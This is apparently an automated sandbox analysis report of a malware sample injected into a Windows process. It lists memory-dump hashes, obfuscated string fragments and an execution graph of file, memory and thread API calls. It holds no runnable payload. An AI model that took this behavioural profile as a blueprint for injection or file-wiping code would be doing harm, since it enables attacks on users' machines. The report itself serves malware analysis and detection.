                                                                                      • API ID:
                                                                                      • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                                      • API String ID: 0-392141074
                                                                                      • Opcode ID: 2ccb6d27f3608386a638da94827ade35dbead1070bdf7ae3f8a96a40d857fe99
                                                                                      • Instruction ID: f1f979bf81fe3e71d8187398d4f1ad48e578a7fc8155218bf9c6c314fb0b85af
                                                                                      • Opcode Fuzzy Hash: 2ccb6d27f3608386a638da94827ade35dbead1070bdf7ae3f8a96a40d857fe99
                                                                                      • Instruction Fuzzy Hash: 5C7161B1D00318BAEB15DBA4CC85FEEBBBDBF48300F00459DE919A6140EB725B488F65
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_5190000_ybjXXpYwhPHZD.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 3$:7)0$:7)0$FZ_W$QxZG$_VdV$_ZXV$`RUR$b<q:$e4<v$p[A\$r]WA$~\IZ
                                                                                      • API String ID: 0-1026646956
                                                                                      • Opcode ID: 716dd61557191e8cae19ee5001ae2abd58d399d363fb7334c54e0fc44c963f43
                                                                                      • Instruction ID: 07c7f8adb27411f445071bc635f720373fd67d7a5297aebbba031ce8ff0bf544
                                                                                      • Opcode Fuzzy Hash: 716dd61557191e8cae19ee5001ae2abd58d399d363fb7334c54e0fc44c963f43
                                                                                      • Instruction Fuzzy Hash: C04122B0C04258DBDB20CFE4D9846DDBFB1FB04704FA08589D46A2F201D7760A0ACF61
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_5190000_ybjXXpYwhPHZD.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                                      • API String ID: 0-685823316
                                                                                      • Opcode ID: 20a550708f072f06e3d0c594ba1762bb2ede6a697bbd5a4af5e41018802d28be
                                                                                      • Instruction ID: 9f51916538db81f677ebad9fa698863dc906ce5993f56ee6c634fc72d13b158e
                                                                                      • Opcode Fuzzy Hash: 20a550708f072f06e3d0c594ba1762bb2ede6a697bbd5a4af5e41018802d28be
                                                                                      • Instruction Fuzzy Hash: 793184B1D51218AEEF40DFE4CC89BEE7BB9BB44304F04815DE608BA180DBB51648CBA5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_5190000_ybjXXpYwhPHZD.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: !$1$4$A$L$^$e$q$q
                                                                                      • API String ID: 0-3638664181
                                                                                      • Opcode ID: 3d051501caa2cf21db3366f9993def72e7b5d88092d63332505618eff565eaaf
                                                                                      • Instruction ID: 6e82d073f6b668e476da87d73f72c99f8fd3202ae2e5bff7227c33dabc858cec
                                                                                      • Opcode Fuzzy Hash: 3d051501caa2cf21db3366f9993def72e7b5d88092d63332505618eff565eaaf
                                                                                      • Instruction Fuzzy Hash: 5A11B020D0C3CAD9DB12C6BC84046EEBF715F12218F0882D9D5E56B2D2D2B95745D7A6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_5190000_ybjXXpYwhPHZD.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: .$P$e$i$m$o$r$x
                                                                                      • API String ID: 0-620024284
                                                                                      • Opcode ID: 529e0ec339277d9cce60750c08ac3387ba96d16ece7f97b770430495e26a5895
                                                                                      • Instruction ID: ff4b6a41527738567a87b6fb3a49676bfc135fed7c150a75b8050f82db8a7bfb
                                                                                      • Opcode Fuzzy Hash: 529e0ec339277d9cce60750c08ac3387ba96d16ece7f97b770430495e26a5895
                                                                                      • Instruction Fuzzy Hash: 2E51A7B2940218BAEB14EBA4CC49FDA777DBF94300F00859DA90997140EBB55B488FA5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_5190000_ybjXXpYwhPHZD.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: L$S$\$a$c$e$l
                                                                                      • API String ID: 0-3322591375
                                                                                      • Opcode ID: e7bef2b088bea7218fb0773293770e332c3fd41e3dbe4db905ea03e5e89706af
                                                                                      • Instruction ID: 7a580584597d48a5f9417f06667d168ce82f75cea55648c9e1618576f74efe6d
                                                                                      • Opcode Fuzzy Hash: e7bef2b088bea7218fb0773293770e332c3fd41e3dbe4db905ea03e5e89706af
                                                                                      • Instruction Fuzzy Hash: F0415672D05218AEDF10EFA4DC89AEEBBF9BF48310F05855ADD0AA7100E77259458F94
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_5190000_ybjXXpYwhPHZD.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: F$P$T$f$r$x
                                                                                      • API String ID: 0-2523166886
                                                                                      • Opcode ID: 17316c19fea47a397f570c04d88be202dd9bd39c9ef15c4b00e4fd198cbdc5aa
                                                                                      • Instruction ID: d18397f1e17fd5ac43e65114e90cc4d86cbe250cd596acfe9a44a69b65a3a90d
                                                                                      • Opcode Fuzzy Hash: 17316c19fea47a397f570c04d88be202dd9bd39c9ef15c4b00e4fd198cbdc5aa
                                                                                      • Instruction Fuzzy Hash: 7151D571A04305AAFB34DF65CC88BEAF7F8FF45740F004619E94A561C0E7B5AA44CBA2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_5190000_ybjXXpYwhPHZD.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $ >ll$e$h$o
                                                                                      • API String ID: 0-3217287860
                                                                                      • Opcode ID: 539582bc43d260b0faf799d0c7f20cee59e9dfb971bae1ff5f5734325cb374c0
                                                                                      • Instruction ID: e0b32a6acd3f8af3aac25da5c1fcca15940ae4acb5f6cddf1af52a1e25afd07d
                                                                                      • Opcode Fuzzy Hash: 539582bc43d260b0faf799d0c7f20cee59e9dfb971bae1ff5f5734325cb374c0
                                                                                      • Instruction Fuzzy Hash: 418176B2940259AAEB24EB54CC89FEE737CFF88300F0445DDE90966040EBB55F858FA5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_5190000_ybjXXpYwhPHZD.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $i$l$o$u
                                                                                      • API String ID: 0-2051669658
                                                                                      • Opcode ID: 8565aab86e351ca4d6503d665da7b4841f62e42a66f1babe3590de0b63572266
                                                                                      • Instruction ID: 38f62a99596f9acaa38a5e596bec3464bea5d352a22ac7910b3ab28dd534c405
                                                                                      • Opcode Fuzzy Hash: 8565aab86e351ca4d6503d665da7b4841f62e42a66f1babe3590de0b63572266
                                                                                      • Instruction Fuzzy Hash: 6F6121B5A00305AFDB24DBA4CC84FEFB7FDFB88710F108959E55597280D635AA45CB50
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_5190000_ybjXXpYwhPHZD.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: -$2$3$3$7
                                                                                      • API String ID: 0-3991079922
                                                                                      • Opcode ID: 20b6886a0511afcc9895669d3c54a8ecea7dcf4d4c1338defab4f65e6ac1aeef
                                                                                      • Instruction ID: 504377acdace4e9fd68a66b17e5815a1630f85d341de2e26deab51e93aa01168
                                                                                      • Opcode Fuzzy Hash: 20b6886a0511afcc9895669d3c54a8ecea7dcf4d4c1338defab4f65e6ac1aeef
                                                                                      • Instruction Fuzzy Hash: CE2132B1A10119BBEB15DBA4CD45BEE77B9FF48304F004159FD04A7240E776AE058BE5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_5190000_ybjXXpYwhPHZD.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $e$k$o
                                                                                      • API String ID: 0-3624523832
                                                                                      • Opcode ID: bf3a1959083af096e637ed5f8f30c9290539da0a7748c00154a889ef3263771a
                                                                                      • Instruction ID: 8099f9fb833a95be520bc2fab575d02a3c0efda37b4cb699cfdd188f0bf41f53
                                                                                      • Opcode Fuzzy Hash: bf3a1959083af096e637ed5f8f30c9290539da0a7748c00154a889ef3263771a
                                                                                      • Instruction Fuzzy Hash: 0FB109B5A00705AFDB24DBA4CC85FEFB7BABF88710F108558F619A7280D675AB41CB50
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_5190000_ybjXXpYwhPHZD.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $e$k$o
                                                                                      • API String ID: 0-3624523832
                                                                                      • Opcode ID: 0885f8cabd546b43c5a132ab9e0c4539c25649a9d06c046cac59ea196f25c022
                                                                                      • Instruction ID: fb132f925c5a0420770e7f62cde466c8512395a94d4e9429b73b07039482ec62
                                                                                      • Opcode Fuzzy Hash: 0885f8cabd546b43c5a132ab9e0c4539c25649a9d06c046cac59ea196f25c022
                                                                                      • Instruction Fuzzy Hash: 0D610AB1A00709AFDB64DFA4CC95FEFB7B9BF88700F108558E61997284D771AA41CB50
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_5190000_ybjXXpYwhPHZD.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                                      • API String ID: 0-2877786613
                                                                                      • Opcode ID: 204234d1976407d9214dc14b2ce8aff4deb33bf9594961efb2db7d795acafe88
                                                                                      • Instruction ID: 1ed9bc76f4c95fe0c4492838824a76a07746bd72171c15a77aee8f74118c0a0b
                                                                                      • Opcode Fuzzy Hash: 204234d1976407d9214dc14b2ce8aff4deb33bf9594961efb2db7d795acafe88
                                                                                      • Instruction Fuzzy Hash: 19415F71A512197AEB01EB90CC96FFFBB7CFF95700F004109FA056A180EBB55A0187EA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_5190000_ybjXXpYwhPHZD.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                                      • API String ID: 0-2877786613
                                                                                      • Opcode ID: 88e119ff2180a0050900eacade21771d4e6dbe2538b787464c22e8b38e6ede55
                                                                                      • Instruction ID: f9a8f5af6a653791b682a79a1ce30c1deb3b626ccb04bd91bc74d32c4622c5dd
                                                                                      • Opcode Fuzzy Hash: 88e119ff2180a0050900eacade21771d4e6dbe2538b787464c22e8b38e6ede55
                                                                                      • Instruction Fuzzy Hash: EA314471A512197AE711EB90CC96FFFBB7CFF95700F004049FA056A180EBB56A0587EA

                                                                                      Execution Graph

                                                                                      Execution Coverage:2.6%
                                                                                      Dynamic/Decrypted Code Coverage:4.8%
                                                                                      Signature Coverage:0.7%
                                                                                      Total number of Nodes:441
                                                                                      Total number of Limit Nodes:70
28c8de0 LdrInitializeThunk 98832->98833 98834 28b5dee 98833->98834 98834->98816 98836 28c87fa 98835->98836 98838 28c87ab 98835->98838 98851 47d39b0 LdrInitializeThunk 98836->98851 98837 28c881f 98837->98825 98838->98825 98841 28c88a7 98840->98841 98843 28c8858 98840->98843 98852 47d4340 LdrInitializeThunk 98841->98852 98842 28c88cc 98842->98827 98843->98827 98846 28c8a0a 98845->98846 98848 28c89bb 98845->98848 98853 47d2fb0 LdrInitializeThunk 98846->98853 98847 28c8a2f 98847->98818 98848->98818 98850->98814 98851->98837 98852->98842 98853->98847 99030 28bfa50 99031 28bfab4 99030->99031 99032 28b6540 2 API calls 99031->99032 99034 28bfbe7 99032->99034 99033 28bfbee 99034->99033 99059 28b6650 99034->99059 99036 28bfd93 99037 28bfc6a 99037->99036 99038 28bfda2 99037->99038 99063 28bf830 99037->99063 99039 28c95c0 NtClose 99038->99039 99041 28bfdac 99039->99041 99042 28bfca6 99042->99038 99043 28bfcb1 99042->99043 99044 28cb6f0 RtlAllocateHeap 99043->99044 99045 28bfcda 99044->99045 99046 28bfcf9 99045->99046 99047 28bfce3 99045->99047 99072 28bf720 CoInitialize 99046->99072 99049 28c95c0 NtClose 99047->99049 99051 28bfced 99049->99051 99050 28bfd07 99075 28c9090 99050->99075 99053 28bfd82 99054 28c95c0 NtClose 99053->99054 99055 28bfd8c 99054->99055 99057 28cb610 RtlFreeHeap 99055->99057 99056 28bfd25 99056->99053 99058 28c9090 LdrInitializeThunk 99056->99058 99057->99036 99058->99056 99060 28b6675 99059->99060 99079 28c8f20 99060->99079 99064 28bf84c 99063->99064 99065 28b47f0 LdrLoadDll 99064->99065 99067 28bf86a 99065->99067 99066 28bf873 99066->99042 99067->99066 99068 28b47f0 LdrLoadDll 99067->99068 99069 28bf93e 99068->99069 99070 28b47f0 LdrLoadDll 99069->99070 99071 28bf99b 99069->99071 99070->99071 99071->99042 99074 28bf785 99072->99074 99073 28bf81b CoUninitialize 99073->99050 99074->99073 99076 28c90aa 99075->99076 99084 47d2ba0 LdrInitializeThunk 99076->99084 99077 28c90da 99077->99056 99080 28c8f3a 99079->99080 99083 47d2c60 LdrInitializeThunk 
99080->99083 99081 28b66e9 99081->99037 99083->99081 99084->99077 98854 28cc710 98855 28cb610 RtlFreeHeap 98854->98855 98856 28cc725 98855->98856 99085 28c92d0 99086 28c9381 99085->99086 99088 28c92fc 99085->99088 99087 28c9397 NtCreateFile 99086->99087 99094 28b10eb 99095 28b10f3 PostThreadMessageW 99094->99095 99096 28b10ff 99094->99096 99095->99096 99097 28b9e61 99098 28b9e6f 99097->99098 99099 28b9e76 99098->99099 99100 28cb610 RtlFreeHeap 99098->99100 99100->99099 98859 28bafa0 98864 28bacb0 98859->98864 98861 28bafad 98878 28ba920 98861->98878 98863 28bafc9 98865 28bacd5 98864->98865 98889 28b85b0 98865->98889 98868 28bae23 98868->98861 98870 28bae3a 98870->98861 98871 28bae31 98871->98870 98873 28baf27 98871->98873 98908 28ba370 98871->98908 98875 28baf8a 98873->98875 98917 28ba6e0 98873->98917 98876 28cb610 RtlFreeHeap 98875->98876 98877 28baf91 98876->98877 98877->98861 98879 28ba936 98878->98879 98882 28ba941 98878->98882 98880 28cb6f0 RtlAllocateHeap 98879->98880 98880->98882 98881 28ba968 98881->98863 98882->98881 98883 28b85b0 GetFileAttributesW 98882->98883 98884 28bac82 98882->98884 98887 28ba370 RtlFreeHeap 98882->98887 98888 28ba6e0 RtlFreeHeap 98882->98888 98883->98882 98885 28bac9b 98884->98885 98886 28cb610 RtlFreeHeap 98884->98886 98885->98863 98886->98885 98887->98882 98888->98882 98890 28b85d1 98889->98890 98891 28b85d8 GetFileAttributesW 98890->98891 98892 28b85e3 98890->98892 98891->98892 98892->98868 98893 28c35a0 98892->98893 98894 28c35ae 98893->98894 98895 28c35b5 98893->98895 98894->98871 98896 28b47f0 LdrLoadDll 98895->98896 98897 28c35ea 98896->98897 98898 28c35f9 98897->98898 98921 28c3060 LdrLoadDll 98897->98921 98900 28cb6f0 RtlAllocateHeap 98898->98900 98904 28c37a7 98898->98904 98901 28c3612 98900->98901 98902 28c379d 98901->98902 98903 28c362e 98901->98903 98901->98904 98902->98904 98905 28cb610 RtlFreeHeap 98902->98905 98903->98904 98906 28cb610 RtlFreeHeap 98903->98906 98904->98871 98905->98904 98907 28c3791 98906->98907 
98907->98871 98909 28ba396 98908->98909 98922 28bdda0 98909->98922 98911 28ba408 98913 28ba590 98911->98913 98914 28ba426 98911->98914 98912 28ba575 98912->98871 98913->98912 98916 28ba230 RtlFreeHeap 98913->98916 98914->98912 98927 28ba230 98914->98927 98916->98913 98918 28ba706 98917->98918 98919 28bdda0 RtlFreeHeap 98918->98919 98920 28ba78d 98919->98920 98920->98873 98921->98898 98924 28bddc4 98922->98924 98923 28bddd1 98923->98911 98924->98923 98925 28cb610 RtlFreeHeap 98924->98925 98926 28bde14 98925->98926 98926->98911 98928 28ba24d 98927->98928 98931 28bde30 98928->98931 98930 28ba353 98930->98914 98933 28bde54 98931->98933 98932 28bdefe 98932->98930 98933->98932 98934 28cb610 RtlFreeHeap 98933->98934 98934->98932 98935 28c9520 98936 28c9548 98935->98936 98937 28c9591 98935->98937 98938 28c95a7 NtDeleteFile 98937->98938 99106 28b8a67 99107 28b8a6a 99106->99107 99108 28b8a21 99107->99108 99110 28b7330 99107->99110 99111 28b7346 99110->99111 99113 28b737f 99110->99113 99111->99113 99114 28b71a0 LdrLoadDll 99111->99114 99113->99108 99114->99113 98939 47d2ad0 LdrInitializeThunk 98940 28a9e30 98941 28a9e3f 98940->98941 98942 28a9e80 98941->98942 98943 28a9e6d CreateThread 98941->98943 98944 28b5e30 98945 28b8340 LdrInitializeThunk 98944->98945 98946 28b5e60 98944->98946 98945->98946 98949 28b82c0 98946->98949 98948 28b5e85 98950 28b8304 98949->98950 98951 28b8325 98950->98951 98956 28c88e0 98950->98956 98951->98948 98953 28b8315 98954 28b8331 98953->98954 98955 28c95c0 NtClose 98953->98955 98954->98948 98955->98951 98957 28c895a 98956->98957 98959 28c890b 98956->98959 98961 47d4650 LdrInitializeThunk 98957->98961 98958 28c897f 98958->98953 98959->98953 98961->98958 98962 28b73b0 98963 28b73cc 98962->98963 98971 28b741f 98962->98971 98965 28c95c0 NtClose 98963->98965 98963->98971 98964 28b7551 98966 28b73e7 98965->98966 98972 28b67d0 NtClose LdrInitializeThunk LdrInitializeThunk 98966->98972 98968 28b7531 98968->98964 98974 28b69a0 NtClose LdrInitializeThunk 
LdrInitializeThunk 98968->98974 98971->98964 98973 28b67d0 NtClose LdrInitializeThunk LdrInitializeThunk 98971->98973 98972->98971 98973->98968 98974->98964 98975 28c9430 98976 28c945b 98975->98976 98977 28c94d4 98975->98977 98978 28c94ea NtReadFile 98977->98978 98979 28c0330 98980 28c0353 98979->98980 98981 28b47f0 LdrLoadDll 98980->98981 98982 28c0377 98981->98982 99120 28c1970 99121 28c198c 99120->99121 99122 28c19c8 99121->99122 99123 28c19b4 99121->99123 99125 28c95c0 NtClose 99122->99125 99124 28c95c0 NtClose 99123->99124 99126 28c19bd 99124->99126 99127 28c19d1 99125->99127 99130 28cb730 RtlAllocateHeap 99127->99130 99129 28c19dc 99130->99129

                                                                                      Control-flow Graph

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3106885173.00000000028A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_28a0000_xwizard.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: +$&$+$-$3f$4$98$;$=e$@$DW$L@$M_$T$U$U$X$X)$ZY$[L$^6$b$b$c$i&$l$m$m$mI$x$$}$b$o
                                                                                      • API String ID: 0-533882937
                                                                                      • Opcode ID: fab792334ad35209d5fd4ed1774f3f63abe4a3e2a37dca734dafb6f9c12b4a4d
                                                                                      • Instruction ID: 0f884c5e85d626b374ab0961b721e12e4625128302779cab2224792da31c1b94
                                                                                      • Opcode Fuzzy Hash: fab792334ad35209d5fd4ed1774f3f63abe4a3e2a37dca734dafb6f9c12b4a4d
                                                                                      • Instruction Fuzzy Hash: BA329FB4E05228CFEB68CF44C8947DDBBB2BB45308F1081D9D149AB681DBB55AC9CF45
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNELBASE(?,00000000), ref: 028BC924
                                                                                      • FindNextFileW.KERNELBASE(?,00000010), ref: 028BC95F
                                                                                      • FindClose.KERNELBASE(?), ref: 028BC96A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3106885173.00000000028A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_28a0000_xwizard.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                      • String ID:
                                                                                      • API String ID: 3541575487-0
                                                                                      • Opcode ID: bebfee3e0a1d94693371a6b2578ecd7aa2155f958ae673e9681450b941bfa544
                                                                                      • Instruction ID: 20fc8553f012cf99793c65f40162a65c968c183a6afb5184e7629db9f4b62b5a
                                                                                      • Opcode Fuzzy Hash: bebfee3e0a1d94693371a6b2578ecd7aa2155f958ae673e9681450b941bfa544
                                                                                      • Instruction Fuzzy Hash: EA31AE7A9003087BEB61DB64CC85FEF777DAF44B05F14445DB908E6280DBB0AA848BA1
                                                                                      APIs
                                                                                      • NtQueryInformationProcess.NTDLL ref: 04ABF0A6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108672426.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4ab0000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID: InformationProcessQuery
                                                                                      • String ID: 2
                                                                                      • API String ID: 1778838933-450215437
                                                                                      • Opcode ID: 8c5844af1c5088e5e7996241b11e056d8a2a29e56f05093f987362b00b987849
                                                                                      • Instruction ID: 2bb6f74935f8c30e950ec7877dbe6a83a672d5ee44cd8a5d2ee268027552d143
                                                                                      • Opcode Fuzzy Hash: 8c5844af1c5088e5e7996241b11e056d8a2a29e56f05093f987362b00b987849
                                                                                      • Instruction Fuzzy Hash: E6210F7711A796ABDB020F74A8842E07FBA9F43A64B1C449ED6C08F357C222A41BD3C1
                                                                                      APIs
                                                                                      • NtCreateFile.NTDLL(?,?,?,2EC3667A,?,?,?,?,?,?,?), ref: 028C93C8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3106885173.00000000028A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_28a0000_xwizard.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateFile
                                                                                      • String ID:
                                                                                      • API String ID: 823142352-0
                                                                                      • Opcode ID: 0ef41e7afe924bf652ab708745801da30b8d52ea577ff686edb2d7da9f9e776a
                                                                                      • Instruction ID: 2ba718885183cd2e2db7b8cb5fe800390b95753a85d9edee574fa6bcab33fa2f
                                                                                      • Opcode Fuzzy Hash: 0ef41e7afe924bf652ab708745801da30b8d52ea577ff686edb2d7da9f9e776a
                                                                                      • Instruction Fuzzy Hash: A431BAB9A00648AFDB14DF99D881EDE77B9AF8C704F108119F919A7340D770A851CFA5
                                                                                      APIs
                                                                                      • NtReadFile.NTDLL(?,?,?,2EC3667A,?,?,?,?,?), ref: 028C9513
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3106885173.00000000028A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_28a0000_xwizard.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: FileRead
                                                                                      • String ID:
                                                                                      • API String ID: 2738559852-0
                                                                                      • Opcode ID: ad266ff50bd68b21b571e8c3bc2c9e970010c235041cbe2ecf846c778cb5668a
                                                                                      • Instruction ID: 2f50ac832976db477b4d4e6a31e7e540be38a09c122ad21a925d09a81c8188a4
                                                                                      • Opcode Fuzzy Hash: ad266ff50bd68b21b571e8c3bc2c9e970010c235041cbe2ecf846c778cb5668a
                                                                                      • Instruction Fuzzy Hash: 9031CAB9A00648AFDB14DF98D881EDFB7B9EF88714F108219F958A7240D770A911CFA5
                                                                                      APIs
                                                                                      • NtAllocateVirtualMemory.NTDLL(028B207E,?,028C81FF,2EC3667A,00000004,00003000,?,?,?,?,?,028C81FF,028B207E), ref: 028C97E2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3106885173.00000000028A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_28a0000_xwizard.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocateMemoryVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 2167126740-0
                                                                                      • Opcode ID: ef63b65d45bd76397b2e572c24b7f21ef49f5d3eebc40d442f59e95fd419acf5
                                                                                      • Instruction ID: 337bd06e9719369ed66b5ac50e305bbe6007be04b87035eed48193f5b67c2480
                                                                                      • Opcode Fuzzy Hash: ef63b65d45bd76397b2e572c24b7f21ef49f5d3eebc40d442f59e95fd419acf5
                                                                                      • Instruction Fuzzy Hash: C021FCB9A00608AFDB14DF98DC41EAF77B9EF88710F20851DF918A7240D770A951CFA5
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3106885173.00000000028A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_28a0000_xwizard.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: DeleteFile
                                                                                      • String ID:
                                                                                      • API String ID: 4033686569-0
                                                                                      • Opcode ID: d675a746fab8c04bdc7a4cc8700e9d332d4f6330f11bff12e3810a0f30c32112
                                                                                      • Instruction ID: 7170ccea80b8fa465b5b0bbcd28f3c0f69a2d9c86b6069ebd75133d5547f7445
                                                                                      • Opcode Fuzzy Hash: d675a746fab8c04bdc7a4cc8700e9d332d4f6330f11bff12e3810a0f30c32112
                                                                                      • Instruction Fuzzy Hash: 8411A0796006086FE620EB68CC41FAFB77DDF85714F20814DFA58A7280DB71B9018BE6
                                                                                      APIs
                                                                                      • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 028C95F7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3106885173.00000000028A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_28a0000_xwizard.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Close
                                                                                      • String ID:
                                                                                      • API String ID: 3535843008-0
                                                                                      • Opcode ID: b128fb59003eb0adba234b6788b47a4bfe4ce5fdf048b5cfc933ca3de64206b9
                                                                                      • Instruction ID: f8f50095687ed14520f4328361faed8bf0587acd05ba04e5509cfcbbe3816185
                                                                                      • Opcode Fuzzy Hash: b128fb59003eb0adba234b6788b47a4bfe4ce5fdf048b5cfc933ca3de64206b9
                                                                                      • Instruction Fuzzy Hash: F8E04F3E2002047BD620EA59CC00F977B6DDFC6714F414415FA49A7140CA70B90186E5
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmp
